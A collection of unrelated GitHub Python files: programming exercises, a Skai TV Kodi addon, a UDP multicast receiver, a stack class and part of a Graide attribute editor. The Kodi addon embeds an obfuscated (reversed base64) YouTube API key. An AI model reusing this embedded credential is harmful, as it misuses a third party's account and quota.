numero_es_divisible_entre_9(numero):\n if numero % 9 == 0:\n return True\n\n\nnumeros = [3, 7, 9, 34, 72, 90, 87, 34, 99, 56, 12, 18]\n\nlist(filter(numero_es_divisible_entre_9, numeros))\n\n\n#AND\ndef numero_es_divisible_entre_3(numero):\n if numero % 3 == 0:\n return True\n else:\n return False\n\n\ndef numero_es_menor_que_10(numero):\n if numero < 10:\n return True\n else:\n return False\n\nnumero_es_divisible_entre_3(9) and numero_es_menor_que_10(9)\n\n\nnumeros = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]\n\n\ndef numero_es_divisible_entre_3_y_menor_que_10(numero):\n return numero_es_divisible_entre_3(numero) and numero_es_menor_que_10(numero)\n\nnuevo_output_2 = list(filter(numero_es_divisible_entre_3_y_menor_que_10, numeros))\nprint(nuevo_output_2)\n\n\n#not\nnuevo_output_3 = not(numero_es_divisible_entre_3(9))\nprint(nuevo_output_3)\n\n#lambda\n\nnuevo_output_4 = list(filter(lambda x: not numero_es_divisible_entre_3(x), numeros))\nprint(nuevo_output_4)\n\npalabras = [\"achicoria\", \"pasto\", \"sol\", \"loquillo\", \"moquillo\", \"sed\", \"pez\", \"jacaranda\", \"mil\"]\n\nlist(filter(lambda x: len(x) > 5, palabras))\n\n\n\n","repo_name":"Fresitaconcrema/Modulo4","sub_path":"Procesamiento_de_datos/bd_3_programacion_funcional.py","file_name":"bd_3_programacion_funcional.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"12922418326","text":"N = int(input())\ninfo_dict = {}\norder_list = []\nboard = [[0 for _ in range(N)] for _ in range(N)]\nfor i in range(N**2):\n tmp = list(map(int, input().split()))\n info_dict[tmp[0]] = tmp[1:]\n order_list.append(tmp[0])\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\ndef search(ns):\n # 0 : like_cnt, 1 : empty_cnt\n like_info = {0 : [], 1: [], 2:[], 3:[], 4:[]}\n empty_info = {0 : [], 1: [], 2:[], 3:[], 4:[]}\n for i in range(N):\n for j in range(N):\n x, y = i, j\n if board[x][y] != 0 : continue\n like_cnt, empty_cnt = 0, 0\n for d in range(4):\n nx = x + dx[d]\n ny = y + dy[d]\n if 0 <= nx < N and 0 <= ny < N :\n if board[nx][ny] in info_dict[ns] : like_cnt += 1\n like_info[like_cnt].append([x, y])\n for k in range(4, -1, -1):\n if len(like_info[k]) == 1 :\n x, y = like_info[k][0]\n board[x][y] = ns\n break\n elif len(like_info[k]) > 1 :\n like_info[k].sort()\n for it in range(len(like_info[k])):\n x, y = like_info[k][it]\n empty_cnt = 0\n for d in range(4):\n nx = x + dx[d]\n ny = y + dy[d]\n if 0 <= nx < N and 0 <= ny < N :\n if board[nx][ny] == 0 : empty_cnt += 1\n empty_info[empty_cnt].append([x, y])\n for empty in range(4, -1, -1):\n if empty_info[empty] :\n empty_info[empty].sort()\n x, y = empty_info[empty][0]\n board[x][y] = ns\n break\n break\ndef scoring():\n global score\n s_list = [0, 1, 10, 100, 1000]\n for i in range(N):\n for j in range(N):\n x, y = i, j\n student = board[x][y]\n cnt = 0\n for d in range(4):\n nx = x + dx[d]\n ny = y + dy[d]\n if 0 <= nx < N and 0 <= ny < N :\n if board[nx][ny] in info_dict[student] : cnt += 1\n score += s_list[cnt]\n\ndef solve():\n for st in range(N**2):\n search(order_list[st])\n scoring()\n\nscore = 0\nsolve()\nprint(score)","repo_name":"HPYoo/swcodingtest","sub_path":"prob21608.py","file_name":"prob21608.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"41563830126","text":"__author__ = 'bilge'\ndef distance(point1, point2):\n \"\"\"\n Returns the Euclidean distance of two points in the Cartesian Plane.\n\n distance([3,4],[0,0])\n 5.0\n distance([3,6],[10,6])\n 7.0\n \"\"\"\n return ((point1[0] - point2[0])**2 + (point1[1] - point2[1])**2) ** 0.5\n\n\ndata = [[0,1],[2,3],[4,5]]\ndata2 = data\nwhile data2:\n print(min(data2, key=lambda x: distance(data[-1], x)))","repo_name":"aysebilgegunduz/vehicle_routing_problem","sub_path":"deneme.py","file_name":"deneme.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"74194790074","text":"import logging\nimport json\nfrom weibo import Client\n\nfrom .base import BaseHandler\n\n\nclass HomeHandler(BaseHandler):\n\n logger = logging.getLogger('tomorrow.utiltiy.sina.home')\n def get(self):\n key, secret = self.get_app()\n error = self.get_argument('err', None)\n return self.render(\n 'utility/sina/home.html',\n key=key,\n secret=secret,\n error=error\n )\n\n def post(self):\n app_key = self.get_argument('app-key')\n app_secret = self.get_argument('app-secret')\n self.set_app(app_key, app_secret)\n client = Client(api_key=app_key, api_secret=app_secret,\n redirect_uri=self.callback_url)\n\n return self.write(json.dumps({'url': client.authorize_url}))\n\n\n","repo_name":"TylerTemp/tomorrow","sub_path":"lib/hdlr/utility/sina/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71259439355","text":"# Find Digits\n# https://www.hackerrank.com/challenges/find-digits/problem\n\nl = []\nfor _ in range(int(input().strip())):\n n = int(input().strip())\n a = list(map(int, str(n)))\n count = 0\n for i in a:\n if i != 0 and n % i == 0: count += 1\n l.append(count)\nprint(*l, sep = '\\n')\n","repo_name":"harshildarji/Algorithms-HackerRank","sub_path":"Implementation Challenges/Find Digits.py","file_name":"Find Digits.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"96"} +{"seq_id":"16402024685","text":"# -*- coding: utf-8 -*-\n\n'''\n Skai Player Addon\n Author Twilight0\n\n SPDX-License-Identifier: GPL-3.0-only\n See LICENSES/GPL-3.0-only for more information.\n'''\n\nimport json, re\nfrom base64 import b64decode\nfrom tulip import bookmarks, directory, client, cache, control, youtube\nfrom tulip.parsers import itertags\nfrom tulip.compat import zip, iteritems\nfrom youtube_resolver import resolve as yt_resolver\n\ncache_method = cache.FunctionCache().cache_method\n\n\nclass Indexer:\n\n def __init__(self):\n\n self.list = []; self.data = []\n self.base_link = 'https://www.skaitv.gr'\n self.old_base = 'https://www.skai.gr'\n self.radio_base = 'http://www.skairadio.gr'\n self.yt_channel = 'UCmHgxU394HiIAsN1fMegqzw'\n self.yt_key = b64decode('0AXQxNFejdVT2w2RtY0V1cWMrl3YSFjVyQEUUl3Sfp0Q5NVY6lUQ'[::-1])\n self.tvshows_link = ''.join([self.base_link, '/shows/seires'])\n self.entertainment_link = ''.join([self.base_link, '/shows/psuchagogia'])\n self.news_link = ''.join([self.base_link, '/shows/enimerosi'])\n self.live_link = ''.join([self.base_link, '/live'])\n self.podcasts_link = ''.join([self.radio_base, '/shows?page=0'])\n self.play_link = 'https://videostream.skai.gr/skaivod/_definst_/mp4:skai/'\n self.radio_link = 'https://skai.live24.gr/skai1003'\n\n def root(self, audio_only=False):\n\n self.list = [\n {\n 'label': control.lang(30001),\n 'title': 'Skai Live TV',\n 'action': 'play',\n 'isFolder': 'False',\n 'icon': 'live.png',\n 'url': self.live_link\n }\n ,\n {\n 'label': control.lang(30014),\n 'title': 'Skai Radio 100.3FM',\n 'action': 'play',\n 'url': self.radio_link,\n 'isFolder': 'False',\n 'icon': 'live.png'\n }\n ,\n {\n 'title': control.lang(30006),\n 'action': 'news',\n 'icon': 'news.png'\n }\n ,\n {\n 'title': control.lang(30002),\n 'action': 'shows',\n 'icon': 'tvshows.png',\n 'url': self.tvshows_link\n }\n ,\n {\n 'title': control.lang(30015),\n 'action': 'shows',\n 'icon': 'entertainment.png',\n 'url': self.entertainment_link\n }\n ,\n {\n 'title': control.lang(30003),\n 'action': 'podcasts',\n 'icon': 'podcasts.png'\n }\n ,\n {\n 'title': control.lang(30004),\n 'action': 'archive',\n 'icon': 'archive.png'\n }\n ,\n {\n 'title': control.lang(30005),\n 'action': 'latest',\n 'icon': 'latest.png'\n }\n ,\n {\n 'title': control.lang(30008),\n 'action': 'bookmarks',\n 'icon': 'bookmarks.png'\n }\n ]\n\n if audio_only:\n\n self.list = [self.list[1]] + [self.list[3]]\n\n for item in self.list:\n\n cache_clear = {'title': 30009, 'query': {'action': 'cache_clear'}}\n item.update({'cm': [cache_clear]})\n\n directory.add(self.list, content='videos')\n\n def bookmarks(self):\n\n self.list = bookmarks.get()\n\n if not self.list:\n na = [{'title': control.lang(30018), 'action': None}]\n directory.add(na)\n return\n\n for i in self.list:\n bookmark = dict((k, v) for k, v in iteritems(i) if not k == 'next')\n bookmark['delbookmark'] = i['url']\n i.update({'cm': [{'title': 30502, 'query': {'action': 'deleteBookmark', 'url': json.dumps(bookmark)}}]})\n\n self.list = sorted(self.list, key=lambda k: k['title'].lower())\n\n directory.add(self.list, content='videos')\n\n @cache_method(172800)\n def yt_playlists(self):\n\n return youtube.youtube(key=self.yt_key).playlists(self.yt_channel)\n\n @cache_method(3600)\n def yt_videos(self):\n\n return youtube.youtube(key=self.yt_key).videos(self.yt_channel, limit=2)\n\n @cache_method(3600)\n def yt_playlist(self, url):\n\n return youtube.youtube(key=self.yt_key).playlist(url)\n\n def archive(self):\n\n self.list = self.yt_playlists()\n\n if self.list is None:\n return\n\n for i in self.list:\n i['title'] = client.replaceHTMLCodes(i['title'])\n i.update({'action': 'episodes'})\n bookmark = dict((k, v) for k, v in iteritems(i) if not k == 'next')\n bookmark['bookmark'] = i['url']\n i.update({'cm': [{'title': 30501, 'query': {'action': 'addBookmark', 'url': json.dumps(bookmark)}}]})\n\n control.sortmethods('title')\n\n directory.add(self.list, content='videos')\n\n def shows(self, url):\n\n self.list = self.generic_listing(url)\n\n if self.list is None:\n return\n\n for i in self.list:\n\n i.update({'action': 'episodes'})\n\n bookmark = dict((k, v) for k, v in iteritems(i) if not k == 'next')\n bookmark['bookmark'] = i['url']\n\n i.update({'cm': [{'title': 30501, 'query': {'action': 'addBookmark', 'url': json.dumps(bookmark)}}]})\n\n directory.add(self.list, content='videos')\n\n @cache_method(3600)\n def pod_listing(self, url):\n\n html = client.request(url)\n\n listing = client.parseDOM(html, 'div', attrs={'class': 'row border-bottom pt-4 m-0 show-item'})\n\n nexturl = re.sub(r'\\d(?!\\d)', lambda x: str(int(x.group(0)) + 1), url)\n\n for item in listing:\n\n title = client.parseDOM(item, 'h3')[0].replace(''', '\\'')\n if title.startswith(')', select, re.S)\n\n for pod in pods:\n\n date = re.search(r'(\\d{2}/\\d{2}/\\d{4})', pod).group(1)\n title = ' - '.join([client.parseDOM(html, 'h2', attrs={'class': 'mb-3.+?'})[0], date])\n url = ''.join([self.radio_base, re.search(r'data-url = \"([\\w\\-/]+)\"', pod).group(1)])\n\n self.list.append({'title': title, 'image': image, 'url': url})\n\n return self.list\n\n def episodes(self, url):\n\n if self.base_link in url:\n self.list = self.episodes_listing(url)\n elif self.radio_base in url:\n self.list = self.pod_episodes(url)\n else:\n self.list = self.yt_playlist(url)\n\n if self.list is None:\n\n return\n\n for i in self.list:\n\n i.update({'action': 'play', 'isFolder': 'False'})\n\n directory.add(self.list, content='videos')\n\n @cache_method(3600)\n def video_listing(self, url):\n\n html = client.request(url)\n\n try:\n nexturl = ''.join(\n [\n self.old_base, '/videos',\n client.parseDOM(html, 'a', attrs={'rel': 'next'}, ret='href')[0].replace('&', '&')\n ]\n )\n except IndexError:\n nexturl = None\n\n video_list = client.parseDOM(html, 'div', attrs={'class': 'videoItem cell'}, ret='data-video-url')\n thumbnails = client.parseDOM(html, 'div', attrs={'class': 'videoItem cell'}, ret='data-video-poster')\n titles = client.parseDOM(html, 'div', attrs={'class': 'videoItem cell'}, ret='data-video-name')\n dates = client.parseDOM(html, 'div', attrs={'class': 'videoItem cell'}, ret='data-video-date')\n\n listing = list(zip(titles, dates, thumbnails, video_list))\n\n for title, date, image, video in listing:\n\n title = client.replaceHTMLCodes(title)\n\n label = ''.join([title, ' ', '(', date, ')'])\n\n self.list.append(\n {\n 'title': label, 'image': image, 'url': video, 'next': nexturl, 'nextlabel': 30500,\n 'nextaction': 'videos'\n }\n )\n\n return self.list\n\n def videos(self, url):\n\n self.list = self.video_listing(url)\n\n if self.list is None:\n return\n\n for i in self.list:\n\n i.update({'action': 'play', 'isFolder': 'False'})\n\n directory.add(self.list)\n\n def latest(self):\n\n self.list = self.yt_videos()\n\n if self.list is None:\n return\n\n self.list = [i for i in self.list if int(i['duration']) > 60]\n\n for i in self.list:\n i.update({'action': 'play', 'isFolder': 'False'})\n\n directory.add(self.list)\n\n def news(self):\n\n self.list = [\n {\n 'title': 30011,\n 'action': 'episodes',\n 'icon': 'news.png',\n 'url': ''.join([self.base_link, '/show/enimerosi/oi-eidiseis-tou-ska-stis-2/sezon-2021-2022'])\n }\n ,\n {\n 'title': 30012,\n 'action': 'episodes',\n 'icon': 'news.png',\n 'url': ''.join([self.base_link, '/show/enimerosi/ta-nea-tou-ska-stis-2000/sezon-2021-2022'])\n }\n ,\n {\n 'title': 30005,\n 'action': 'videos',\n 'icon': 'latest.png',\n 'url': ''.join([self.old_base, '/videos?type=recent'])\n }\n ,\n {\n 'title': 30016,\n 'action': 'videos',\n 'icon': 'popular.png',\n 'url': ''.join([self.old_base, '/videos?type=popular'])\n }\n ,\n {\n 'title': 30017,\n 'action': 'videos',\n 'icon': 'recommended.png',\n 'url': ''.join([self.old_base, '/videos?type=featured'])\n }\n ]\n\n directory.add(self.list, content='videos')\n\n def play(self, url):\n\n resolved = self.resolve(url)\n\n if 'youtu' in resolved:\n resolved = self.yt_session(resolved)\n\n if isinstance(resolved, tuple):\n\n stream, plot = resolved\n meta = {'plot': plot}\n\n else:\n\n stream = resolved\n meta = None\n\n icon = None\n\n if url == self.live_link:\n\n icon = {'poster': control.icon(), 'icon': control.icon(), 'thumb': control.icon()}\n\n dash = ('dash' in stream or '.mpd' in stream or 'm3u8' in stream) and control.kodi_version() >= 18.0\n\n directory.resolve(\n url=stream, meta=meta, dash=dash, icon=icon,\n mimetype='application/vnd.apple.mpegurl' if 'm3u8' in stream else None,\n manifest_type='hls' if '.m3u8' in stream else None\n )\n\n @cache_method(1440)\n def generic_listing(self, url):\n\n html = client.request(url)\n\n if url == self.news_link:\n new = 'row m-0 listrow new-videos'\n new_items = 'col-12 pl-0 pr-0 list1 list-item color_enimerosi'\n archive = 'row m-0 listrow s234 '\n archived_items = 'col-12 pl-0 pr-0 list1 list-item color_enimerosi'\n elif url == self.entertainment_link:\n new = 'row listrow list2 '\n new_items = 'd-none d-md-block col-md-4 listimg color_psuchagogia'\n archive = 'row listrow list2 s234 '\n archived_items = 'd-none d-md-block col-md-3 listimg color_psuchagogia'\n else:\n new = 'row listrow list2 '\n new_items = 'd-none d-md-block col-md-4 listimg color_seires'\n archive = 'row listrow list2 s234 '\n archived_items = 'd-none d-md-block col-md-3 listimg color_seires'\n\n div = client.parseDOM(html, 'div', attrs={'class': new})[0]\n\n listing = client.parseDOM(div, 'div', attrs={'class': new_items})\n\n for item in listing:\n\n title = client.parseDOM(item, 'h3')[0]\n image = client.parseDOM(item, 'img', ret='src')[0]\n\n url = ''.join([self.base_link, client.parseDOM(item, 'a', ret='href')[0]])\n\n self.list.append({'title': title, 'url': url, 'image': image})\n\n if 's234' in html:\n\n div = client.parseDOM(html, 'div', attrs={'class': archive})[0]\n items = client.parseDOM(div, 'div', attrs={'class': archived_items})\n\n for item in items:\n\n title = ' - '.join([client.parseDOM(item, 'h3')[0], control.lang(30013)])\n image = client.parseDOM(item, 'img', ret='src')[0]\n\n url = ''.join([self.base_link, client.parseDOM(item, 'a', ret='href')[0]])\n\n self.list.append({'title': title, 'url': url, 'image': image})\n\n return self.list\n\n @cache_method(180)\n def episodes_listing(self, url):\n\n html = client.request(url)\n\n div = client.parseDOM(html, 'div', attrs={'class': 'row listrow list2 ?'})[0]\n\n listing = [i.text for i in itertags(div, 'div')]\n\n for item in listing:\n\n try:\n title = client.parseDOM(item, 'h3')[0].replace('
', ' ').replace('
', ' ')\n except Exception:\n continue\n image = client.parseDOM(item, 'img', ret='src')[0]\n\n url = ''.join([self.base_link, client.parseDOM(item, 'a', ret='href')[0]])\n\n self.list.append({'title': title, 'url': url, 'image': image})\n\n return self.list\n\n @cache_method(720)\n def episode_resolver(self, url):\n\n html = client.request(url)\n\n if url.startswith(self.radio_base):\n\n url = re.search(r'[\"\\'](.+?\\.mp3)[\"\\']', html).group(1)\n\n return url\n\n else:\n\n json_ = re.search(r'var data = ({.+})', html).group(1)\n\n json_ = json.loads(json_)\n\n url = ''.join([self.play_link, json_['episode'][0]['media_item_file'], '/chunklist.m3u8'])\n\n plot = client.stripTags(json_['episode'][0]['descr'])\n\n return url, plot\n\n def resolve(self, url):\n\n if url == self.live_link:\n\n html = client.request(self.live_link)\n\n json_ = re.search(r'var data = ({.+?});', html).group(1)\n\n json_ = json.loads(json_)\n\n return json_['now']['livestream']\n\n elif len(url) == 11:\n\n link = self.yt_session(url)\n\n return link\n\n elif 'episode' in url:\n\n return self.episode_resolver(url)\n\n else:\n\n return url\n\n @staticmethod\n def yt_session(link):\n\n streams = yt_resolver(link)\n\n try:\n addon_enabled = control.addon_details('inputstream.adaptive').get('enabled')\n except KeyError:\n addon_enabled = False\n\n if not addon_enabled:\n\n streams = [s for s in streams if 'mpd' not in s['title']]\n\n stream = streams[0]['url']\n\n return stream\n","repo_name":"gggbbbuuu/GM","sub_path":"addons/plugin.video.skai.gr/resources/lib/skai.py","file_name":"skai.py","file_ext":"py","file_size_in_byte":16294,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"96"} +{"seq_id":"21518654853","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom argparse import ArgumentParser\r\nfrom collections import namedtuple\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport os\r\n\r\nfrom PIL import Image\r\n\r\n\r\nRectangle = namedtuple('Recltangle', 'x,y,width,height')\r\n\r\nparser = ArgumentParser(\r\n '''\r\n Compare two rectangular areas of an image\r\n '''\r\n)\r\nparser.add_argument(\r\n '--rectangle1',\r\n nargs=4,\r\n type=int,\r\n required=True,\r\n help='''\r\n X, Y, Width and Height of the first rectangle to compare\r\n ''',\r\n)\r\nparser.add_argument(\r\n '--rectangle2',\r\n nargs=4,\r\n type=int,\r\n required=True,\r\n help='''\r\n X, Y, Width and Height of the second rectangle to compare\r\n ''',\r\n)\r\nparser.add_argument(\r\n 'image',\r\n help='''\r\n The image whose areas to compare\r\n ''',\r\n)\r\n\r\n\r\ndef split_and_avg_channels(sample):\r\n return (\r\n sample[:, :, 0].mean(),\r\n sample[:, :, 1].mean(),\r\n sample[:, :, 2].mean(),\r\n )\r\n\r\n\r\ndef main():\r\n args = parser.parse_args()\r\n image = Image.open(args.image)\r\n nparray = np.array(image)\r\n sample_rect1 = Rectangle(*args.rectangle1)\r\n sample_rect2 = Rectangle(*args.rectangle2)\r\n sample1 = nparray[\r\n sample_rect1.y : sample_rect1.y + sample_rect1.height,\r\n sample_rect1.x : sample_rect1.x + sample_rect1.width\r\n ]\r\n sample2 = nparray[\r\n sample_rect2.y : sample_rect2.y + sample_rect2.height,\r\n sample_rect2.x : sample_rect2.x + sample_rect2.width\r\n ]\r\n r1, g1, b1 = split_and_avg_channels(sample1)\r\n r2, g2, b2 = split_and_avg_channels(sample2)\r\n print('R1 = {}, G1 = {}, B1 = {}'.format(r1, g1, b1))\r\n print('R2 = {}, G2 = {}, B2 = {}'.format(r2, g2, b2))\r\n\r\nmain()\r\n# with love from makeda and oleg","repo_name":"drcandacemakedamoore/opensource4medicine","sub_path":"compare_swatches.py","file_name":"compare_swatches.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"40272958307","text":"# RECEIVER\nimport socket\nimport struct\n\nMCAST_GRP = '224.1.1.1'\nMCAST_PORT = 5004\n\n# Multicast\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\nsock.bind(('', MCAST_PORT))\nmreq = struct.pack(\"4sl\", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)\n\nsock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)\n\n# Broadcast\nUDP_IP = '127.0.0.2' # Mengikat ke semua antarmuka jaringan yang tersedia\nUDP_PORT = 5006\n\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nclient_socket.bind((UDP_IP, UDP_PORT))\n\n\nwhile True:\n # Multicast\n print(f\"ini multicast : {sock.recv(10240)}\")\n \n # Broadcast\n data, address = client_socket.recvfrom(1024)\n print(f\"Menerima data dari {address}: {data.decode()}\")","repo_name":"IvanSholana/TubesProgjar","sub_path":"Client_2.py","file_name":"Client_2.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"73649779836","text":"# 約数の数を数える\ndef divisor_count(num):\n if num == 1:\n return 1\n if num < 1:\n return 0\n result = 1\n\n calcNum = num\n count = 0\n\n while calcNum % 2 == 0:\n calcNum //= 2\n count += 1\n\n if count != 0:\n result *= count + 1\n\n suggest_prime = 3\n while suggest_prime <= calcNum:\n count = 0\n while calcNum % suggest_prime == 0:\n calcNum //= suggest_prime\n count += 1\n if count != 0:\n result *= count + 1\n suggest_prime += 2\n\n return result\n\ncount = 500\ntriangle = 1\n\ntmp_num = 2\nwhile divisor_count(triangle) <= count:\n triangle += tmp_num\n tmp_num += 1\n\nprint(triangle)\n","repo_name":"KKishikawa/project-euler-for-study-code","sub_path":"011-020/012.py","file_name":"012.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74676260155","text":"class Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n\r\n\r\nclass Stack:\r\n def __init__(self):\r\n self.head = None\r\n self.minimum = []\r\n self.size = 0\r\n\r\n def get_size(self):\r\n return self.size\r\n\r\n def push(self, data):\r\n node = Node(data)\r\n if self.head == None:\r\n self.head = node\r\n else:\r\n node.next = self.head\r\n self.head = node\r\n self.minimum.append(node.data)\r\n self.size += 1\r\n\r\n def print_list(self):\r\n current = self.head\r\n show = \"\"\r\n while current != None:\r\n show += str(current.data) + ' '\r\n current = current.next\r\n return show\r\n\r\n def pop(self):\r\n if self.head == None:\r\n self.minimum = []\r\n self.size = 0\r\n return None\r\n else:\r\n tmp = self.head\r\n self.head = tmp.next\r\n self.minimum.remove(tmp.data)\r\n\r\n if tmp.data is not None:\r\n self.size += 1\r\n return tmp.data\r\n\r\n\r\nclass SetOfStacks:\r\n def __init__(self):\r\n self.stacks = []\r\n self.capacity = 3\r\n self.number_stacks = 0\r\n\r\n def push(self, data):\r\n if len(self.stacks) == 0:\r\n stack = Stack()\r\n stack.push(data)\r\n self.stacks.append(stack)\r\n\r\n else:\r\n current_stack = self.stacks[self.number_stacks]\r\n if current_stack.get_size() >= 3:\r\n new_stack = Stack()\r\n new_stack.push(data)\r\n self.stacks.append(new_stack)\r\n self.number_stacks += 1\r\n else:\r\n current_stack.push(data)\r\n\r\n def pop(self):\r\n last_index = len(self.stacks) - 1\r\n last_stack = self.stacks[last_index]\r\n last_stack.pop()\r\n if last_stack.get_size() == 0:\r\n self.number_stacks -= 1\r\n del self.stacks[last_index]\r\n\r\n def print_list(self):\r\n show = \"\"\r\n for i in range(len(self.stacks)):\r\n show += \"Stack \" + str(i+1) + \": \"\r\n stack = self.stacks[i]\r\n show += stack.print_list()\r\n show += \"\\n\"\r\n print(show)\r\n\r\n\r\nset_of_stacks = SetOfStacks()\r\nset_of_stacks.push(3)\r\nset_of_stacks.push(4)\r\nset_of_stacks.push(5)\r\nset_of_stacks.push(1)\r\nset_of_stacks.push(0)\r\nset_of_stacks.push(7)\r\nset_of_stacks.push(9)\r\n\r\nset_of_stacks.print_list()\r\nset_of_stacks.pop()\r\nset_of_stacks.pop()\r\nset_of_stacks.pop()\r\nset_of_stacks.print_list()","repo_name":"zalogarciam/CrackingTheCodeInterview","sub_path":"Chapter 3/StackOfPlates.py","file_name":"StackOfPlates.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"16500462601","text":"from qtpy import QtCore, QtGui, QtWidgets\nfrom graide.utils import ModelSuper, DataObj\nimport traceback\nimport os\n\n#for line in traceback.format_stack(): print(line.strip())\n\n\"\"\"\n Here is a summary of how the Python Slots and Signals interact to update the Glyph tab when a glyph is clicked:\n\n Set up connections:\n runView.glyphSelect.connect(passesView.changeGlyph)\n mainWindow.tab_passes.glyphSelected.connect(mainWindow.glyphSelected)\n mainWindow.tab_passes.glyphSelected.connect(mainwindow.glyphAttrib.changeData)\n\n Then when a glyph is clicked on:\n RunView::changeSelection\n calls self.glyphSelected.emit (defined as Signal)\n PassesView::changeGlyph\n calls self.glyphSelected.emit (defined as Signal)\n MainWindow::glyphSelected\n ...\n AttribView::changeData\n\"\"\"\n\nclass LinePlainTextEdit(QtWidgets.QPlainTextEdit) :\n\n editFinished = QtCore.Signal()\n\n def keyPressEvent(self, key) :\n if key.matches(QtGui.QKeySequence.InsertParagraphSeparator) :\n # or key.matches(QtGui.QKeySequence.InsertLineSeparator) :\n self.editFinished.emit()\n else :\n return super(LinePlainTextEdit, self).keyPressEvent(key)\n \n\nclass AttrValueListDialog(QtWidgets.QDialog) :\n \n def __init__(self, parent, glyphName, gClassList) :\n super(AttrValueListDialog,self).__init__(parent)\n \n # Hide the help icon, all it does it take up space.\n #icon = self.windowIcon() -- just in case icon gets lost\n flags = self.windowFlags()\n helpFlag = QtCore.Qt.WindowContextHelpButtonHint\n flags = flags & (~helpFlag)\n self.setWindowFlags(flags)\n #self.setWindowIcon(icon)\n\n self.setWindowTitle(glyphName)\n listWidget = QtWidgets.QListWidget(self)\n #listWidget.clicked.connect(self.doReturn)\n itemHeight = 18\n cnt = 0\n for gClass in gClassList:\n if gClass == \"\" or gClass == \" \" :\n continue\n \n item = QtWidgets.QListWidgetItem(gClass)\n item.setSizeHint(QtCore.QSize(200, itemHeight))\n listWidget.addItem(item)\n cnt = cnt + 1\n \n listWidget.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n if cnt <= 25 :\n displayCnt = 4 if cnt < 5 else cnt\n listWidget.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n # It's okay if the list and dialog widths don't match, since there's no scroll bar.\n # Make the list widget wide enough that they can expand the dialog and see wide names.\n listWidget.setFixedWidth(300)\n self.setMinimumWidth(200)\n else :\n displayCnt = 25\n listWidget.setFixedWidth(300) # make it wide enough to handle long names\n self.setMinimumWidth(300)\n #listWidget.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)\n \n listWidget.setFixedHeight(displayCnt * itemHeight + 10)\n self.setMinimumHeight(displayCnt * itemHeight + 10)\n \n # end of __init_\n \n \n def doReturn(self) :\n self.done(0) # close\n \n# end of class AttrValueListDialog\n\n\nclass AttributeDelegate(QtWidgets.QStyledItemDelegate) :\n\n def __init__(self, parent) :\n super(AttributeDelegate, self).__init__(parent)\n self.parent = parent\n\n def createEditor(self, parent, option, index) :\n dat = index.data()\n if index.column() == 0 :\n pass\n elif index.column() == 1 and dat and len(dat) > 20 :\n editor = LinePlainTextEdit(parent)\n editor.editFinished.connect(self.commitAndCloseEditor)\n editor.setMinimumHeight(100)\n return editor\n else :\n return super(AttributeDelegate, self).createEditor(parent, option, index)\n\n def setEditorData(self, editor, index) :\n if index.column() == 1 and len(index.data()) > 20 :\n editor.setPlainText(index.data())\n else :\n super(AttributeDelegate, self).setEditorData(editor, index)\n\n def setModelData(self, editor, model, index) :\n if index.column() == 1 and index.data and len(index.data()) > 20 :\n model.setData(index, editor.toPlainText(), QtCore.Qt.EditRole)\n else :\n super(AttributeDelegate, self).setModelData(editor, model, index)\n\n def commitAndCloseEditor(self) :\n editor = self.sender()\n self.commitData.emit(editor)\n self.closeEditor.emit(editor)\n \n#end of class AttributeDelegate\n\n\nclass Attribute(object) :\n\n def __init__(self, name, getter, setter, isTree = False, fileLoc = None, extraPath = None, listPopup = False, *params) :\n self.name = name\n self.setter = setter\n self.getter = getter\n self.params = params\n self.isTree = isTree # debugging\n self.tree = params[0] if isTree else None # an AttribModel, if this has an embedded tree\n if fileLoc and extraPath:\n fileLocFile = os.path.join(extraPath, fileLoc[0]) # make file path relative to GDX file\n fileLoc = (fileLocFile, fileLoc[1])\n self.fileLoc = fileLoc\n self.doesListPopup = listPopup\n \n def child(self, row) :\n if self.tree :\n return self.tree.child(row)\n return None\n\n def childNumber(self, row) :\n if self.tree :\n return self.tree.rowCount(None)\n return 0\n\n def getData(self, column) :\n if column == 0 :\n return self.name\n elif column == 1 and self.getter :\n return self.getter(*self.params)\n return None\n\n def setData(self, column, value) :\n if column == 0 and value:\n self.name = value\n return True\n elif column == 1 and self.setter:\n params = list(self.params[:]) + [value]\n self.setter(*params)\n return True\n return False\n\n def isEditable(self, column) :\n if self.setter : return True\n return False\n \n def getFileLoc(self, treePath) :\n if self.fileLoc :\n return self.fileLoc\n 